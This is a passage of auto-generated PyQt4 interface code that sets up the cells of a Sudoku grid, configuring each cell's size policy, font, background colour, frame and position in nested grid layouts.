self.label_1_6.setTextFormat(QtCore.Qt.PlainText)
self.label_1_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_6.setObjectName(_fromUtf8("label_1_6"))
self.gridLayout_3.addWidget(self.label_1_6, 1, 0, 1, 1)
self.label_0_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_6.sizePolicy().hasHeightForWidth())
self.label_0_6.setSizePolicy(sizePolicy)
self.label_0_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_6.setFont(font)
self.label_0_6.setAutoFillBackground(False)
self.label_0_6.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_6.setFrameShape(QtGui.QFrame.Panel)
self.label_0_6.setLineWidth(1)
self.label_0_6.setText(_fromUtf8(""))
self.label_0_6.setTextFormat(QtCore.Qt.PlainText)
self.label_0_6.setScaledContents(False)
self.label_0_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_6.setObjectName(_fromUtf8("label_0_6"))
self.gridLayout_3.addWidget(self.label_0_6, 0, 0, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_3, 0, 2, 1, 1)
self.gridLayout_8 = QtGui.QGridLayout()
self.gridLayout_8.setSpacing(0)
self.gridLayout_8.setObjectName(_fromUtf8("gridLayout_8"))
self.label_6_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_3.sizePolicy().hasHeightForWidth())
self.label_6_3.setSizePolicy(sizePolicy)
self.label_6_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_3.setFont(font)
self.label_6_3.setAutoFillBackground(False)
self.label_6_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_6_3.setFrameShape(QtGui.QFrame.Panel)
self.label_6_3.setLineWidth(1)
self.label_6_3.setText(_fromUtf8(""))
self.label_6_3.setTextFormat(QtCore.Qt.PlainText)
self.label_6_3.setScaledContents(False)
self.label_6_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_3.setObjectName(_fromUtf8("label_6_3"))
self.gridLayout_8.addWidget(self.label_6_3, 0, 0, 1, 1)
self.label_8_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_3.sizePolicy().hasHeightForWidth())
self.label_8_3.setSizePolicy(sizePolicy)
self.label_8_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_3.setFont(font)
self.label_8_3.setAutoFillBackground(False)
self.label_8_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_8_3.setFrameShape(QtGui.QFrame.Panel)
self.label_8_3.setText(_fromUtf8(""))
self.label_8_3.setTextFormat(QtCore.Qt.PlainText)
self.label_8_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_3.setObjectName(_fromUtf8("label_8_3"))
self.gridLayout_8.addWidget(self.label_8_3, 2, 0, 1, 1)
self.label_7_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_4.sizePolicy().hasHeightForWidth())
self.label_7_4.setSizePolicy(sizePolicy)
self.label_7_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_4.setFont(font)
self.label_7_4.setAutoFillBackground(False)
self.label_7_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_7_4.setFrameShape(QtGui.QFrame.Panel)
self.label_7_4.setText(_fromUtf8(""))
self.label_7_4.setTextFormat(QtCore.Qt.PlainText)
self.label_7_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_4.setObjectName(_fromUtf8("label_7_4"))
self.gridLayout_8.addWidget(self.label_7_4, 1, 1, 1, 1)
self.label_6_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_4.sizePolicy().hasHeightForWidth())
self.label_6_4.setSizePolicy(sizePolicy)
self.label_6_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_4.setFont(font)
self.label_6_4.setAutoFillBackground(False)
self.label_6_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_6_4.setFrameShape(QtGui.QFrame.Panel)
self.label_6_4.setFrameShadow(QtGui.QFrame.Plain)
self.label_6_4.setText(_fromUtf8(""))
self.label_6_4.setTextFormat(QtCore.Qt.PlainText)
self.label_6_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_4.setObjectName(_fromUtf8("label_6_4"))
self.gridLayout_8.addWidget(self.label_6_4, 0, 1, 1, 1)
self.label_7_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_3.sizePolicy().hasHeightForWidth())
self.label_7_3.setSizePolicy(sizePolicy)
self.label_7_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_3.setFont(font)
self.label_7_3.setAutoFillBackground(False)
self.label_7_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_7_3.setFrameShape(QtGui.QFrame.Panel)
self.label_7_3.setText(_fromUtf8(""))
self.label_7_3.setTextFormat(QtCore.Qt.PlainText)
self.label_7_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_3.setObjectName(_fromUtf8("label_7_3"))
self.gridLayout_8.addWidget(self.label_7_3, 1, 0, 1, 1)
self.label_8_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_4.sizePolicy().hasHeightForWidth())
self.label_8_4.setSizePolicy(sizePolicy)
self.label_8_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_4.setFont(font)
self.label_8_4.setAutoFillBackground(False)
self.label_8_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_8_4.setFrameShape(QtGui.QFrame.Panel)
self.label_8_4.setText(_fromUtf8(""))
self.label_8_4.setTextFormat(QtCore.Qt.PlainText)
self.label_8_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_4.setObjectName(_fromUtf8("label_8_4"))
self.gridLayout_8.addWidget(self.label_8_4, 2, 1, 1, 1)
self.label_6_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_5.sizePolicy().hasHeightForWidth())
self.label_6_5.setSizePolicy(sizePolicy)
self.label_6_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_5.setFont(font)
self.label_6_5.setAutoFillBackground(False)
self.label_6_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_6_5.setFrameShape(QtGui.QFrame.Panel)
self.label_6_5.setText(_fromUtf8(""))
self.label_6_5.setTextFormat(QtCore.Qt.PlainText)
self.label_6_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_5.setObjectName(_fromUtf8("label_6_5"))
self.gridLayout_8.addWidget(self.label_6_5, 0, 2, 1, 1)
self.label_7_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_5.sizePolicy().hasHeightForWidth())
self.label_7_5.setSizePolicy(sizePolicy)
self.label_7_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_5.setFont(font)
self.label_7_5.setAutoFillBackground(False)
self.label_7_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_7_5.setFrameShape(QtGui.QFrame.Panel)
self.label_7_5.setText(_fromUtf8(""))
self.label_7_5.setTextFormat(QtCore.Qt.PlainText)
self.label_7_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_5.setObjectName(_fromUtf8("label_7_5"))
self.gridLayout_8.addWidget(self.label_7_5, 1, 2, 1, 1)
self.label_8_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_5.sizePolicy().hasHeightForWidth())
self.label_8_5.setSizePolicy(sizePolicy)
self.label_8_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_5.setFont(font)
self.label_8_5.setAutoFillBackground(False)
self.label_8_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_8_5.setFrameShape(QtGui.QFrame.Panel)
self.label_8_5.setText(_fromUtf8(""))
self.label_8_5.setTextFormat(QtCore.Qt.PlainText)
self.label_8_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_5.setObjectName(_fromUtf8("label_8_5"))
self.gridLayout_8.addWidget(self.label_8_5, 2, 2, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_8, 2, 1, 1, 1)
self.gridLayout_4 = QtGui.QGridLayout()
self.gridLayout_4.setSpacing(0)
self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
self.label_3_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_2.sizePolicy().hasHeightForWidth())
self.label_3_2.setSizePolicy(sizePolicy)
self.label_3_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_2.setFont(font)
self.label_3_2.setAutoFillBackground(False)
self.label_3_2.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_2.setFrameShape(QtGui.QFrame.Panel)
self.label_3_2.setText(_fromUtf8(""))
self.label_3_2.setTextFormat(QtCore.Qt.PlainText)
self.label_3_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_2.setObjectName(_fromUtf8("label_3_2"))
self.gridLayout_4.addWidget(self.label_3_2, 0, 2, 1, 1)
self.label_4_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_1.sizePolicy().hasHeightForWidth())
self.label_4_1.setSizePolicy(sizePolicy)
self.label_4_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_1.setFont(font)
self.label_4_1.setAutoFillBackground(False)
self.label_4_1.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_1.setFrameShape(QtGui.QFrame.Panel)
self.label_4_1.setText(_fromUtf8(""))
self.label_4_1.setTextFormat(QtCore.Qt.PlainText)
self.label_4_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_1.setObjectName(_fromUtf8("label_4_1"))
self.gridLayout_4.addWidget(self.label_4_1, 1, 1, 1, 1)
self.label_4_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_0.sizePolicy().hasHeightForWidth())
self.label_4_0.setSizePolicy(sizePolicy)
self.label_4_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_0.setFont(font)
self.label_4_0.setAutoFillBackground(False)
self.label_4_0.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_0.setFrameShape(QtGui.QFrame.Panel)
self.label_4_0.setText(_fromUtf8(""))
self.label_4_0.setTextFormat(QtCore.Qt.PlainText)
self.label_4_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_0.setObjectName(_fromUtf8("label_4_0"))
self.gridLayout_4.addWidget(self.label_4_0, 1, 0, 1, 1)
self.label_5_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_1.sizePolicy().hasHeightForWidth())
self.label_5_1.setSizePolicy(sizePolicy)
self.label_5_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_1.setFont(font)
self.label_5_1.setAutoFillBackground(False)
self.label_5_1.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_1.setFrameShape(QtGui.QFrame.Panel)
self.label_5_1.setText(_fromUtf8(""))
self.label_5_1.setTextFormat(QtCore.Qt.PlainText)
self.label_5_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_1.setObjectName(_fromUtf8("label_5_1"))
self.gridLayout_4.addWidget(self.label_5_1, 2, 1, 1, 1)
self.label_4_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_2.sizePolicy().hasHeightForWidth())
self.label_4_2.setSizePolicy(sizePolicy)
self.label_4_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_2.setFont(font)
self.label_4_2.setAutoFillBackground(False)
self.label_4_2.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_2.setFrameShape(QtGui.QFrame.Panel)
self.label_4_2.setText(_fromUtf8(""))
self.label_4_2.setTextFormat(QtCore.Qt.PlainText)
self.label_4_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_2.setObjectName(_fromUtf8("label_4_2"))
self.gridLayout_4.addWidget(self.label_4_2, 1, 2, 1, 1)
self.label_3_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_1.sizePolicy().hasHeightForWidth())
self.label_3_1.setSizePolicy(sizePolicy)
self.label_3_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_1.setFont(font)
self.label_3_1.setAutoFillBackground(False)
self.label_3_1.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_1.setFrameShape(QtGui.QFrame.Panel)
self.label_3_1.setFrameShadow(QtGui.QFrame.Plain)
self.label_3_1.setText(_fromUtf8(""))
self.label_3_1.setTextFormat(QtCore.Qt.PlainText)
self.label_3_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_1.setObjectName(_fromUtf8("label_3_1"))
self.gridLayout_4.addWidget(self.label_3_1, 0, 1, 1, 1)
self.label_3_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_0.sizePolicy().hasHeightForWidth())
self.label_3_0.setSizePolicy(sizePolicy)
self.label_3_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_0.setFont(font)
self.label_3_0.setAutoFillBackground(False)
self.label_3_0.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_0.setFrameShape(QtGui.QFrame.Panel)
self.label_3_0.setLineWidth(1)
self.label_3_0.setText(_fromUtf8(""))
self.label_3_0.setTextFormat(QtCore.Qt.PlainText)
self.label_3_0.setScaledContents(False)
self.label_3_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_0.setObjectName(_fromUtf8("label_3_0"))
self.gridLayout_4.addWidget(self.label_3_0, 0, 0, 1, 1)
self.label_5_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_2.sizePolicy().hasHeightForWidth())
self.label_5_2.setSizePolicy(sizePolicy)
self.label_5_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_2.setFont(font)
self.label_5_2.setAutoFillBackground(False)
self.label_5_2.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_2.setFrameShape(QtGui.QFrame.Panel)
self.label_5_2.setText(_fromUtf8(""))
self.label_5_2.setTextFormat(QtCore.Qt.PlainText)
self.label_5_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_2.setObjectName(_fromUtf8("label_5_2"))
self.gridLayout_4.addWidget(self.label_5_2, 2, 2, 1, 1)
self.label_5_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_0.sizePolicy().hasHeightForWidth())
self.label_5_0.setSizePolicy(sizePolicy)
self.label_5_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_0.setFont(font)
self.label_5_0.setAutoFillBackground(False)
self.label_5_0.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_0.setFrameShape(QtGui.QFrame.Panel)
self.label_5_0.setText(_fromUtf8(""))
self.label_5_0.setTextFormat(QtCore.Qt.PlainText)
self.label_5_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_0.setObjectName(_fromUtf8("label_5_0"))
self.gridLayout_4.addWidget(self.label_5_0, 2, 0, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_4, 1, 0, 1, 1)
self.gridLayout_2 = QtGui.QGridLayout()
self.gridLayout_2.setSpacing(0)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.label_1_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_4.sizePolicy().hasHeightForWidth())
self.label_1_4.setSizePolicy(sizePolicy)
self.label_1_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_4.setFont(font)
self.label_1_4.setAutoFillBackground(False)
self.label_1_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_1_4.setFrameShape(QtGui.QFrame.Panel)
self.label_1_4.setText(_fromUtf8(""))
self.label_1_4.setTextFormat(QtCore.Qt.PlainText)
self.label_1_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_4.setObjectName(_fromUtf8("label_1_4"))
self.gridLayout_2.addWidget(self.label_1_4, 1, 1, 1, 1)
self.label_1_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_3.sizePolicy().hasHeightForWidth())
self.label_1_3.setSizePolicy(sizePolicy)
self.label_1_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_3.setFont(font)
self.label_1_3.setAutoFillBackground(False)
self.label_1_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_1_3.setFrameShape(QtGui.QFrame.Panel)
self.label_1_3.setText(_fromUtf8(""))
self.label_1_3.setTextFormat(QtCore.Qt.PlainText)
self.label_1_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_3.setObjectName(_fromUtf8("label_1_3"))
self.gridLayout_2.addWidget(self.label_1_3, 1, 0, 1, 1)
self.label_0_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_4.sizePolicy().hasHeightForWidth())
self.label_0_4.setSizePolicy(sizePolicy)
self.label_0_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_4.setFont(font)
self.label_0_4.setAutoFillBackground(False)
self.label_0_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_0_4.setFrameShape(QtGui.QFrame.Panel)
self.label_0_4.setFrameShadow(QtGui.QFrame.Plain)
self.label_0_4.setText(_fromUtf8(""))
self.label_0_4.setTextFormat(QtCore.Qt.PlainText)
self.label_0_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_4.setObjectName(_fromUtf8("label_0_4"))
self.gridLayout_2.addWidget(self.label_0_4, 0, 1, 1, 1)
self.label_2_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_3.sizePolicy().hasHeightForWidth())
self.label_2_3.setSizePolicy(sizePolicy)
self.label_2_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_3.setFont(font)
self.label_2_3.setAutoFillBackground(False)
self.label_2_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_2_3.setFrameShape(QtGui.QFrame.Panel)
self.label_2_3.setText(_fromUtf8(""))
self.label_2_3.setTextFormat(QtCore.Qt.PlainText)
self.label_2_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_3.setObjectName(_fromUtf8("label_2_3"))
self.gridLayout_2.addWidget(self.label_2_3, 2, 0, 1, 1)
self.label_1_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_5.sizePolicy().hasHeightForWidth())
self.label_1_5.setSizePolicy(sizePolicy)
self.label_1_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_5.setFont(font)
self.label_1_5.setAutoFillBackground(False)
self.label_1_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_1_5.setFrameShape(QtGui.QFrame.Panel)
self.label_1_5.setText(_fromUtf8(""))
self.label_1_5.setTextFormat(QtCore.Qt.PlainText)
self.label_1_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_5.setObjectName(_fromUtf8("label_1_5"))
self.gridLayout_2.addWidget(self.label_1_5, 1, 2, 1, 1)
self.label_0_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_5.sizePolicy().hasHeightForWidth())
self.label_0_5.setSizePolicy(sizePolicy)
